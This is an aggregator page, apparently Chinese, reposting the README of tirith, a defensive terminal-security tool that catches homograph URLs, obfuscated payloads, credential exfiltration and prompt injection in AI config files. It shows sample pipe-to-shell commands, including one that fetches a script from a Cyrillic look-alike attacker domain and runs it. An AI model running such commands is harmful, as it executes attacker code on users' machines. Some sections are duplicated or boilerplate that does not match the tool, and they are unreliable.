tirith Agent工作流 是 AI Skill Hub 本期精选Agent工作流之一。已获得 2.3k 颗 GitHub Star,综合评分 8.2 分,整体质量较高。我们强烈推荐将其纳入你的 AI 工具库,帮助提升工作效率。
tirith Agent工作流 是一套完整的 AI Agent 自动化工作流方案。通过可视化的节点编排,将复杂的多步骤任务拆解为清晰的自动化流程,实现全程无人值守的智能处理。支持与数百种外部服务和 API 无缝集成,适合构建数据处理管线、业务自动化和 AI 辅助决策系统。
tirith Agent工作流 是一套完整的 AI Agent 自动化工作流方案。通过可视化的节点编排,将复杂的多步骤任务拆解为清晰的自动化流程,实现全程无人值守的智能处理。支持与数百种外部服务和 API 无缝集成,适合构建数据处理管线、业务自动化和 AI 辅助决策系统。
# 方式一:cargo install(推荐) cargo install tirith # 方式二:从源码编译 git clone https://github.com/sheeki03/tirith cd tirith cargo build --release # 二进制在 ./target/release/tirith
# 查看帮助 tirith --help # 基本运行 tirith [options] <input> # 详细使用说明请查阅文档 # https://github.com/sheeki03/tirith
# tirith 配置说明 # 查看配置选项 tirith --config-example > config.yml # 常见配置项 # output_dir: ./output # log_level: info # workers: 4 # 环境变量(覆盖配置文件) export TIRITH_CONFIG="/path/to/config.yml"
Your browser would catch this. Your terminal won't.
<p align="center"> <img src="assets/cover.png" alt="tirith, terminal security" width="100%" /> </p>
Website | Docs | SKILL.md | Changelog
<a href="https://vercel.com/open-source-program"> <img alt="Vercel OSS Program" src="https://vercel.com/oss/program-badge-2026.svg" /> </a>
<sub>Independent open-source project, with hosting supported by the Vercel Open Source Program (Spring 2026 Cohort).</sub>
---
Can you spot the difference?
curl -sSL https://install.example-cli.dev | bash # safe
curl -sSL https://іnstall.example-clі.dev | bash # compromised
You can't. Neither can your terminal. Both і characters are Cyrillic (U+0456), not Latin i. The second URL resolves to an attacker's server. The script executes before you notice.
Browsers solved this years ago. Terminals still render Unicode, ANSI escapes, and invisible characters without question. AI agents run shell commands and install packages without inspecting what's inside.
Tirith stands at the gate. It intercepts commands, pasted content, and scanned files for homograph URLs, obfuscated payloads, credential exfiltration, malicious AI skills/configs, and known-bad packages/domains/IPs from a signed threat intelligence database before they execute.
brew install tirith
Then activate in your shell profile:
```bash
```
curl -fsSL -o tirith.tar.gz \ https://github.com/sheeki03/tirith/releases/latest/download/tirith-aarch64-unknown-linux-musl.tar.gz tar xzf tirith.tar.gz install -Dm755 tirith "$PREFIX/bin/tirith" tirith --version
Then activate the shell hook in `~/.bashrc` (Termux's default shell is bash):
bash eval "$(tirith init --shell bash)" # add to ~/.bashrc ```
[!NOTE] Termux support is best-effort. The musl artifact is built and smoke-tested in CI, but tirith is not yet continuously tested on a real Android device. If a hook misbehaves under Termux, please open an issue with tirith doctor output.
tirith policy init # creates .tirith/policy.yaml in your repo
tirith policy validate # check for syntax/schema errors
tirith policy test "curl https://example.com | bash" # dry-run against policy
tirith policy init accepts --template <name> for a curated starter policy:
tirith policy init --template individual # solo developer defaults (alias: personal)
tirith policy init --template ci-strict # fail-closed, no bypass, scan fail-on
tirith policy init --template ai-agent-heavy # tuned for heavy AI-agent use
tirith policy init --template oss-maintainer # reviewing contributor-controllable risk
tirith policy init --template startup # small-team balance
tirith policy init --template enterprise # strict, with an active package_policy block
tirith policy init --template mcp-strict # locked-down MCP server and tool trust
Each template is a well-commented, schema-valid policy you can edit further. With no --template, tirith policy init writes the full default policy.
tirith scan detects prompt injection and hidden payloads in AI config files. It prioritizes and scans 50+ known AI config file patterns:
.cursorrules, .windsurfrules, .clinerules, CLAUDE.md, copilot-instructions.md.claude/ settings, agents, skills, plugins, rules.cursor/, .vscode/, .windsurf/, .cline/, .continue/, .roo/, .codex/ configsmcp.json, .mcp.json, mcp_settings.json.github/copilot-instructions.md, .github/agents/*.mdWhat it catches in configs:
tirith package risk <ecosystem> <name> scores a package's supply-chain / maintainer risk the way tirith score scores a URL, a deterministic, fully explainable sum of named factors, no model and no learned weights. tirith package explain <ecosystem> <name> adds the factor-by-factor derivation; both take --format json.
tirith package risk npm react # 0/100, a known-popular package
tirith package risk npm reqeusts # high, one edit from a popular name
tirith package explain pypi flask # factor-by-factor derivation
tirith package risk npm left-pad --path ./node_modules/left-pad
tirith package risk --online npm react # also consult the registry API
Offline by default. With no flags, every signal is local, with no network call: (1) name vs. popular packages: known-popular, unknown, or a one-edit near-miss of a popular name (the classic typosquat/slopsquat shape), from the local threat database's popular set; (2) known malicious typosquat: an exact match in the threat DB's typosquat index; (3) install / lifecycle scripts and (4) bundled binary blobs, detected only when the package content is locally available (under node_modules / site-packages, or via --path). tirith never downloads the package.
--online adds registry provenance. It consults the package's registry (npm, PyPI, or crates.io) for six more factors in the same factor-sum model: package/version age, an established package with no owners, an abnormal version spike, very low downloads, a missing source repo, and yanked/deprecated status. It is the only path that touches the network (never the check hot path); --offline / TIRITH_OFFLINE force offline regardless. Failures fall back to the offline score with an honest api signals: unavailable, and responses are cached with a TTL so repeated runs do not hammer the registries.
The score is advisory and standalone: package risk is not a detection rule and changes no verdict, exit code, or audit log.
Debian / Ubuntu (.deb):
Download from GitHub Releases, then:
sudo dpkg -i tirith_*_amd64.deb
Fedora / RHEL / CentOS 9+ (.rpm):
Download from GitHub Releases, then:
sudo dnf install ./tirith-*.rpm
Arch Linux (AUR):
```bash yay -S tirith
Oh-My-Zsh:
```bash git clone https://github.com/sheeki03/ohmyzsh-tirith \ ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/tirith
plugins=(... tirith) ```
Use tirith setup <tool> for one-command configuration:
tirith setup claude-code --with-mcp # Claude Code + MCP server
tirith setup codex # OpenAI Codex
tirith setup copilot-cli # GitHub Copilot CLI (run from repo root)
tirith setup cursor # Cursor
tirith setup gemini-cli --with-mcp # Gemini CLI + MCP server
tirith setup kiro # Kiro CLI (formerly Amazon Q)
tirith setup pi-cli # Pi CLI
tirith setup vscode # VS Code
tirith setup windsurf # Windsurf
For manual configuration, see mcp/clients/ for per-tool guides.
GitHub Action with SARIF upload to GitHub Security tab:
- uses: sheeki03/tirith@v1
with:
fail_on: high
sarif: true
Also available as a pre-commit hook: see .pre-commit-hooks.yaml in this repo.
Scan supports --include, --exclude, --profile (loads named profiles from policy), and --ignore filters for targeted CI scanning.
tirith填补���AI工作流安全防护空白,针对同形字符攻击的解决方案业界罕见。Rust实现保证性能,2.3k星证明认可度。持续维护活跃,值得关注。
该工具使用 AGPL-3.0 协议,商用场景请仔细阅读协议条款,必要时咨询法律意见。
AI Skill Hub 为第三方内容聚合平台,本页面信息基于公开数据整理,不对工具功能和质量作任何法律背书。
建议在沙箱或测试环境中充分验证后,再部署至生产环境,并做好必要的安全评估。
⚠️ AGPL 3.0 — 最严格的 Copyleft,网络服务端使用也需开源,SaaS 使用受限。
经综合评估,tirith Agent工作流 在Agent工作流赛道中表现稳健,质量优秀。如果你已有明确的使用需求,可以直接上手体验;如果还在评估阶段,建议对比同类工具后再做决策。
| 原始名称 | tirith |
| 原始描述 | 开源AI工作流:Terminal security for developers and AI agents. Intercepts homograph URLs, pipe-。⭐2.3k · Rust |
| Topics | 终端安全同形攻击防护CLI工具开发者工具Rust项目 |
| GitHub | https://github.com/sheeki03/tirith |
| License | AGPL-3.0 |
| 语言 | Rust |
收录时间:2026-05-19 · 更新时间:2026-05-19 · License:AGPL-3.0 · AI Skill Hub 不对第三方内容的准确性作法律背书。
选择 Agent 类型,复制安装指令后粘贴到对应客户端